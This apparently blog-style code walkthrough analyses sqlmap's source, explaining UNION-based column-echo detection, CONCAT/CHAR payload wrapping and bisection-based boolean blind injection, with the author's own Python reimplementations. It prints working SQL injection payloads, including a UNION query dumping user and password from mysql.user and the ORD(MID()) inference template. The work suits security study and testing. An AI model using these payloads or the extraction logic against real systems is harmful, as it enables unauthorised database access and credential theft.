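Reading the sqlmap Source Code (3)

Recap

The previous two posts covered how sqlmap runs step by step from main to the action() function, and then I analyzed in detail how the MySQL version is fingerprinted and confirmed. The inject.getValue function is crucial here. The last post took a deep look at the preprocessing function expandAsteriskForColumns and, using MySQL as the example, analyzed how unionUse confirms that UNION injection works and how it determines the number of columns. It finished with how agent.concatQuery casts and wraps the payload, stopping right before the core part, __unionPosition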

unionPosition

The function is not long; it is shown below. Note that the expression passed in here is the payload after casting

For example, SELECT user, password FROM mysql.user becomes CONCAT('mMvPxc',IFNULL(CAST(user AS CHAR(10000)), ' '),'nXlgnR',IFNULL(CAST(password AS CHAR(10000)), ' '),'YnCzLl') FROM mysql.user

def __unionPosition(count, expression):
    logMsg  = "confirming inband sql injection on parameter "
    logMsg += "'%s'" % kb.injParameter
    logger.info(logMsg)

    # For each column of the table (# of NULL) perform a request using
    # the UNION ALL SELECT statement to test it the target url is
    # affected by an exploitable inband SQL injection vulnerability
    for exprPosition in range(0, kb.unionCount):
        # Prepare expression with delimiters
        randQuery = randomStr()
        randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
        randQueryUnescaped = unescaper.unescape(randQueryProcessed)

        ......

        # Forge the inband SQL injection request
        query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition)
        payload = agent.payload(newValue=query)

        # Perform the request
        resultPage = Request.queryPage(payload, content=True)
        count += 1

        # We have to assure that the randQuery value is not within the
        # HTML code of the result page because, for instance, it is there
        # when the query is wrong and the back-end DBMS is Microsoft SQL
        # server
        htmlParsed = htmlParser(resultPage, paths.ERRORS_XML)

        if randQuery in resultPage and not htmlParsed:
            setUnion(position=exprPosition)

            break

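Note that agent.concatQuery receives a random string here rather than a statement. Tracing the code, execution reaches the step below

random input string -> CONCAT('random string 1',IFNULL(CAST(random input string AS CHAR(10000)), ' '),'random string 2')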

concatQuery = "CONCAT('%s',%s,'%s')" % (temp.start, concatQuery, temp.stop)
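
To make the wrapping step concrete, here is a minimal sketch of how such a CONCAT expression could be assembled. The names null_and_cast and concat_fields are my own and are not sqlmap functions; the real agent.concatQuery handles more cases (other DBMSs, statements without FROM, and so on).

```python
def null_and_cast(field):
    """Wrap one column so NULL becomes a space and every type becomes text."""
    return "IFNULL(CAST(%s AS CHAR(10000)), ' ')" % field


def concat_fields(fields, start, delimiter, stop):
    """Join the wrapped columns between start/delimiter/stop markers.

    Hypothetical helper for illustration only (MySQL syntax).
    """
    parts = ["'%s'" % start]
    for i, field in enumerate(fields):
        if i > 0:
            parts.append("'%s'" % delimiter)
        parts.append(null_and_cast(field))
    parts.append("'%s'" % stop)
    return "CONCAT(%s)" % ",".join(parts)


print(concat_fields(["user", "password"], "mMvPxc", "nXlgnR", "YnCzLl"))
```

With the markers from the example at the top of this section, the output is the same CONCAT(...) expression shown there, minus the trailing FROM clause.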

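Next, the unescape function converts string literals into the CHAR(X,Y,Z) form built from ASCII codes. The if check (elided above) compares the lengths of expression and randQueryUnescaped, the string generated from the random value, and pads the shorter one with spaces up to the length of the longer one. Its purpose will be analyzed later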
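
The literal-to-CHAR conversion is easy to reproduce. The sketch below is my own simplification, not sqlmap's unescaper: it assumes MySQL syntax and does not handle literals that contain escaped quotes.

```python
import re


def to_mysql_char(text):
    """Spell out a string as a MySQL CHAR(...) call, one code per character."""
    return "CHAR(%s)" % ",".join(str(ord(ch)) for ch in text)


def unescape_literals(expression):
    """Replace every single-quoted literal with its CHAR(...) equivalent.

    Simplification: escaped quotes inside literals are not supported.
    """
    return re.sub(r"'([^']+)'", lambda m: to_mysql_char(m.group(1)), expression)


print(unescape_literals("CONCAT('ab',user,' ')"))
```

The point of this conversion is that the final payload contains no quote characters, so it survives quote escaping on the server side.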

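Now step into the forgeInbandQuery function

1. prefixQuery was analyzed in the previous post: it determines the closing characters needed for the injection and adds them here as a prefix

2. exprPosition is the index of the column the loop is currently testing

3. postfixQuery was analyzed in the previous post: it appends the comment and the AND clause after the payload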

        inbandQuery = self.prefixQuery("UNION ALL SELECT ")

        if not exprPosition:
            exprPosition = kb.unionPosition

        for element in range(kb.unionCount):
            if element > 0:
                inbandQuery += ", "

            if element == exprPosition:
                if " FROM " in query:
                    conditionIndex = query.rindex(" FROM ")
                    inbandQuery += "%s" % query[:conditionIndex]
                else:
                    inbandQuery += "%s" % query
            else:
                inbandQuery += "NULL"

        if " FROM " in query:
            conditionIndex = query.rindex(" FROM ")
            inbandQuery += "%s" % query[conditionIndex:]

        inbandQuery = self.postfixQuery(inbandQuery, kb.unionComment)

        return inbandQuery
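
Stripped of the kb/agent state, the core of this function is small. Below is a standalone sketch under my own naming (forge_union_query, prefix and suffix are illustrative parameters standing in for what prefixQuery and postfixQuery add).

```python
def forge_union_query(query, position, column_count, prefix="", suffix=""):
    """Place `query` in one UNION column and NULL in all the others.

    If the query has a FROM clause, the part before the last " FROM "
    goes into the column and the rest is appended after the column list.
    """
    select_part, from_part = query, ""
    if " FROM " in query:
        split_at = query.rindex(" FROM ")
        select_part, from_part = query[:split_at], query[split_at:]

    columns = [select_part if i == position else "NULL"
               for i in range(column_count)]
    return "%sUNION ALL SELECT %s%s%s" % (
        prefix, ", ".join(columns), from_part, suffix)


print(forge_union_query("CONCAT(a,b) FROM mysql.user", 1, 3,
                        suffix="-- AND 7488=7488"))
```

Using rindex rather than index matters when the selected expression itself contains a subquery with its own FROM.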

Recalling the earlier material, by the time forgeInbandQuery finishes, the query has gone through the following series of transformations

SELECT user, password FROM mysql.user
CONCAT('mMvPxc',IFNULL(CAST(user AS CHAR(10000)), ' '),'nXlgnR',IFNULL(CAST(password AS CHAR(10000)), ' '),'YnCzLl') FROM mysql.user
CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.user
UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488

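The result is shown in the screenshot: the random strings marking the start, the end, and the separator of the query result are plain to see. Here the output shows up in the host column; in fact, as exprPosition changes, the output appears once in each column in turn. Anyone who has done penetration testing will see why: the front end does not necessarily render every column, so the loop tests which column is actually echoed back

After that, agent.payload replaces the original parameter value with the payload

Request.queryPage(payload, content=True) returns the response body when content is True; with the default of False it returns the MD5 of the response body

The response is then checked against the DBMS error patterns in paths.ERRORS_XML. If the generated random string appears in the page and no error message was matched, the echo is considered successful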

htmlParsed = htmlParser(resultPage, paths.ERRORS_XML)

if randQuery in resultPage and not htmlParsed:
    setUnion(position=exprPosition)

    break

if isinstance(kb.unionPosition, int):
    logMsg  = "the target url is affected by an exploitable "
    logMsg += "inband sql injection vulnerability"
    logger.info(logMsg)
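
The position-probing loop can be simulated without a real target. In this sketch fake_page is a made-up stand-in for a page that renders only one column of the row, and the error-page check done by htmlParser is left out on purpose.

```python
import random
import string


def random_marker(length=6):
    """Random alphabetic string, playing the role of randomStr()."""
    return "".join(random.choice(string.ascii_letters) for _ in range(length))


def fake_page(columns, echoed_index=1):
    """Hypothetical target: the template prints a single column only."""
    return "<td>%s</td>" % columns[echoed_index]


def find_echoed_position(column_count, render):
    """Try the marker in each column until it shows up in the page."""
    for position in range(column_count):
        marker = random_marker()
        row = [marker if i == position else "NULL"
               for i in range(column_count)]
        if marker in render(row):
            return position
    return None


print(find_echoed_position(3, fake_page))
```

A fresh marker per request keeps a cached or reflected earlier response from producing a false positive.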

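Taking a quick look at setUnion: it saves the state to the session file and stores the injectable position in kb.unionPosition, which is why the log message above is printed. To recap, unionPosition here is exprPosition, that is, an index into the range of kb.unionCount saved earlier. kb.unionCount is the total number of columns in the UNION injection, and how it is determined was the main topic of the previous post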

    elif position:
        condition = (
                      not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
                      ( not kb.resumedQueries[conf.url].has_key("Union position")
                      ) )
                    )

        if condition:
            dataToSessionFile("[%s][%s][%s][Union position][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], position))

        kb.unionPosition = position

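Time to go back to the unionUse function where we started and keep reading

1. forgeInbandQuery has already been analyzed: it assembles the UNION ALL SELECT statement, and agent.payload substitutes it into the parameter

2. Request.queryPage(payload, content=True) returns the HTML page because content is True

3. The HTML response is searched for the leading and trailing random strings, and the slice resultPage[startPosition:endPosition] yields the value we actually want (see the screenshot above). Note that the slice still includes both markers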

    # Forge the inband SQL injection request
    query = agent.forgeInbandQuery(expression)
    payload = agent.payload(newValue=query)

    logMsg = "query: %s" % query
    logger.info(logMsg)

    # Perform the request
    resultPage = Request.queryPage(payload, content=True)
    count += 1

    if temp.start not in resultPage or temp.stop not in resultPage:
        return

    duration = int(time.time() - start)

    logMsg = "performed %d queries in %d seconds" % (count, duration)
    logger.info(logMsg)

    # Parse the returned page to get the exact inband
    # sql injection output
    startPosition = resultPage.index(temp.start)
    endPosition = resultPage.rindex(temp.stop) + len(temp.stop)
    value = str(resultPage[startPosition:endPosition])

    return value
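
As a follow-up to the slicing above, here is a sketch of how the marked value could be turned into a list of fields. extract_inband_value is a hypothetical helper of mine; unlike the original code it strips the markers, and it only handles a single row.

```python
def extract_inband_value(page, start, stop, delimiter):
    """Return the fields found between the start and stop markers.

    Returns None when either marker is missing, mirroring the early
    return in unionUse.
    """
    if start not in page or stop not in page:
        return None

    begin = page.index(start) + len(start)  # first char after the start marker
    end = page.rindex(stop)                 # first char of the stop marker
    return page[begin:end].split(delimiter)


page = "<td>mMvPxcrootnXlgnR*81F5YnCzLl</td>"
print(extract_inband_value(page, "mMvPxc", "YnCzLl", "nXlgnR"))
```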

This concludes the first part of inject.getValue

goInferenceProxy

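With the first part as a foundation, the second part should be much easier to read

This part mainly obtains results through blind injection (boolean-based blind injection, judging by the code)

The first three lines

1. agent.prefixQuery has appeared many times: it prepends the closing characters to the payload

2. temp.inference is defined in the XML file

3. agent.postfixQuery has appeared many times: it appends the comment and the AND clause after the payload

4. agent.payload has appeared many times: it substitutes the payload for the original request parameter value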

    query          = agent.prefixQuery(temp.inference)
    query          = agent.postfixQuery(query)
    payload        = agent.payload(newValue=query)

      <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>

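The getFields function should be familiar by now: it extracts values with a series of regular expressions. Here expressionFields is the part of the statement after SELECT, and expressionFieldsList is that part split into a list

For example, SELECT A,B,C -> return "A,B,C",[A,B,C]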

def __getFieldsProxy(expression):
    _, _, _, expressionFields = agent.getFields(expression)
    expressionFieldsList = expressionFields.replace(", ", ",")
    expressionFieldsList = expressionFieldsList.split(",")

    return expressionFields, expressionFieldsList
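
For readers who want to experiment, a rough equivalent can be written with one regular expression. This is my own approximation, not agent.getFields: the comma split is naive and breaks on function calls with several arguments.

```python
import re


def get_fields(expression):
    """Return (fields string, fields list) for a simple SELECT statement.

    Naive sketch: commas inside function calls are not handled.
    """
    match = re.search(r"^\s*SELECT\s+(.+?)(?:\s+FROM\s|$)", expression, re.I)
    if match is None:
        return expression, [expression]

    fields = match.group(1)
    return fields, [field.strip() for field in fields.split(",")]


print(get_fields("SELECT user, password FROM mysql.user"))
```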

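A long stretch of code follows that handles user-supplied custom statements. In practice we rarely use sqlmap's feature for writing our own SQL statements, so I don't think this part is worth analyzing; let's skip ahead

Step from __goInferenceFields into __goInference (some code trimmed). Semantically, it first tries to obtain the length of the result (only when ETA display or multithreading is enabled and the DBMS is known), and then uses bisection to retrieve the result itself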

def __goInference(payload, expression):
    if ( conf.eta or conf.threads > 1 ) and kb.dbms:
        _, length, _ = queryOutputLength(expression, payload)
    else:
        length = None
    count, value = bisection(payload, expression, length=length)
    return value

bisection

Step into queryOutputLength. It first looks up the statement in the XML file

lengthQuery         = queries[kb.dbms].length

        <count query="COUNT(%s)"/>

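After the string is converted to CHAR format, bisection is called here as well. The two bisection calls differ in that the first one is called without length; the length it returns is then passed to the second call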

lengthExprUnescaped = unescaper.unescape(lengthExpr)
count, length       = bisection(payload, lengthExprUnescaped)

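Step into bisection. These four lines should all look familiar

1. fieldToCast is everything after SELECT, extracted with regular expressions

2. agent.nullAndCastField turns "a" into IFNULL(CAST(a AS CHAR(10000)), ' ')

3. The original content after SELECT is replaced with the cast version

4. unescape converts string literals into CHAR(X,Y,Z)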

_, _, _, fieldToCast = agent.getFields(expression)
nulledCastedField    = agent.nullAndCastField(fieldToCast)
expressionReplaced   = expression.replace(fieldToCast, nulledCastedField, 1)
expressionUnescaped  = unescaper.unescape(expressionReplaced)

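A fairly long stretch of code after this deals with rendering the progress bar. It is not worth studying: plenty of open-source libraries do this, and it only starts a thread to do some basic arithmetic, which is not hard to implement. Then comes the core part: blind injection with a single thread or with multiple threads

Start with the simple case, single-threaded blind injection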

while True:
    index += 1
    charStart = time.time()
    val = getChar(index)
    if val == None:
        break
    value += val

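Step into getChar

maxValue and minValue bound the ASCII code of the character; strictly speaking, the printable characters are 32-126. queriesCount[0] counts the number of requests. sqlmap's blind injection uses MID to look at only one character per query: idx is the position of that character in the result, and limit is the threshold that the bisection compares against

Recall the payload from earlier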

<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>

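For example, if the expression evaluates to the string root, idx = 1 targets the character r. The last argument, limit, is the ASCII value being compared against, and it is searched within the range 0-127. Bisection speeds up the guessing of each character: at most 7 requests instead of up to 127

Once the MD5 of the result is obtained, it is compared with the MD5 of the default, normal page. If they are equal, the greater-than condition in the payload holds and the lower bound is raised to limit; otherwise the upper bound is lowered to limit. The bisection continues until the interval has width 1, which pins down the exact ASCII code of the character, and then the next character is processed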

    def getChar(idx):
        maxValue = 127
        minValue = 0

        while (maxValue - minValue) != 1:
            queriesCount[0] += 1
            limit = ((maxValue + minValue) / 2)

            forgedPayload = payload % (expressionUnescaped, idx, limit)

            result = Request.queryPage(forgedPayload)

            if result == kb.defaultResult:
                minValue = limit
            else:
                maxValue = limit

            if (maxValue - minValue) == 1:
                if maxValue == 1:
                    return None
                else:
                    return chr(minValue + 1)
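
The whole procedure can be tried offline. In the sketch below the HTTP request and MD5 comparison are replaced by a simulated oracle; make_oracle, get_char and dump are names I made up, and only the INFERENCE template is taken from the XML quoted above. The code is Python 3, so it uses // where the original relies on Python 2 integer division.

```python
INFERENCE = "AND ORD(MID((%s), %d, 1)) > %d"  # template from the XML above


def forge(expression, idx, limit):
    """Show the payload that would be sent for one bisection step."""
    return INFERENCE % (expression, idx, limit)


def make_oracle(secret):
    """Simulated target: answers whether ORD(MID(secret, idx, 1)) > limit.

    Past the end of the string MID returns '' and ORD('') is 0.
    """
    def oracle(idx, limit):
        code = ord(secret[idx - 1]) if idx <= len(secret) else 0
        return code > limit
    return oracle


def get_char(oracle, idx):
    """Bisect the ASCII code of the character at 1-based position idx."""
    low, high = 0, 127
    while high - low != 1:
        limit = (low + high) // 2
        if oracle(idx, limit):   # "true" page: code is above limit
            low = limit
        else:                    # "false" page: code is at most limit
            high = limit
    return None if high == 1 else chr(high)


def dump(oracle):
    """Read characters one by one until get_char signals the end."""
    chars, idx = [], 1
    while True:
        char = get_char(oracle, idx)
        if char is None:
            return "".join(chars)
        chars.append(char)
        idx += 1


print(forge("SELECT user()", 1, 63))
print(dump(make_oracle("root@localhost")))
```

Because the search range is fixed at 0-127, characters outside 7-bit ASCII cannot be recovered this way.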

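The multithreaded part is not difficult either; it just needs locks

Every access to the shared index must acquire the lock with idxlock.acquire() and release it with idxlock.release() afterwards. Printing to the terminal works the same way, acquiring and releasing iolock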

        def downloadThread():
            while True:
                idxlock.acquire()

                if index[0] >= length:
                    idxlock.release()
                    return

                index[0] += 1
                curidx = index[0]
                idxlock.release()

                charStart = time.time()
                val = getChar(curidx)

                if val == None:
                    raise sqlmapValueException, "Failed to get character at index %d (expected %d total)" % (curidx, length)

                value[curidx-1] = val

                if showEta:
                    etaProgressUpdate(time.time() - charStart, index[0])
                elif conf.verbose in ( 1, 2 ):
                    s = "".join([c or "_" for c in value])
                    iolock.acquire()
                    dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), s))
                    iolock.release()

        # Start the threads
        for _ in range(numThreads):
            thread = threading.Thread(target=downloadThread)
            thread.start()
            threads.append(thread)

        # And wait for them to all finish
        for thread in threads:
            thread.join()
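
The same pattern in Python 3 might look like the sketch below. threaded_dump and its parameters are illustrative names; get_char stands for any function that returns the character at a 1-based index, and the progress output is omitted.

```python
import threading


def threaded_dump(get_char, length, num_threads=4):
    """Fetch `length` characters with several workers sharing one index."""
    value = [None] * length
    next_index = [0]              # shared counter, guarded by the lock
    lock = threading.Lock()

    def worker():
        while True:
            with lock:            # claim the next position atomically
                if next_index[0] >= length:
                    return
                next_index[0] += 1
                idx = next_index[0]
            # The slow part (the requests) runs outside the lock.
            value[idx - 1] = get_char(idx)

    threads = [threading.Thread(target=worker) for _ in range(num_threads)]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    return "".join(char or "_" for char in value)


secret = "information_schema"
print(threaded_dump(lambda idx: secret[idx - 1], len(secret)))
```

This also shows why the length has to be known beforehand in the multithreaded case: the workers need a stopping condition that does not depend on the order in which characters arrive.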

At this point we have finished analyzing how inject.getValue works. The next post will continue from here (the hardest part is actually over)

(End)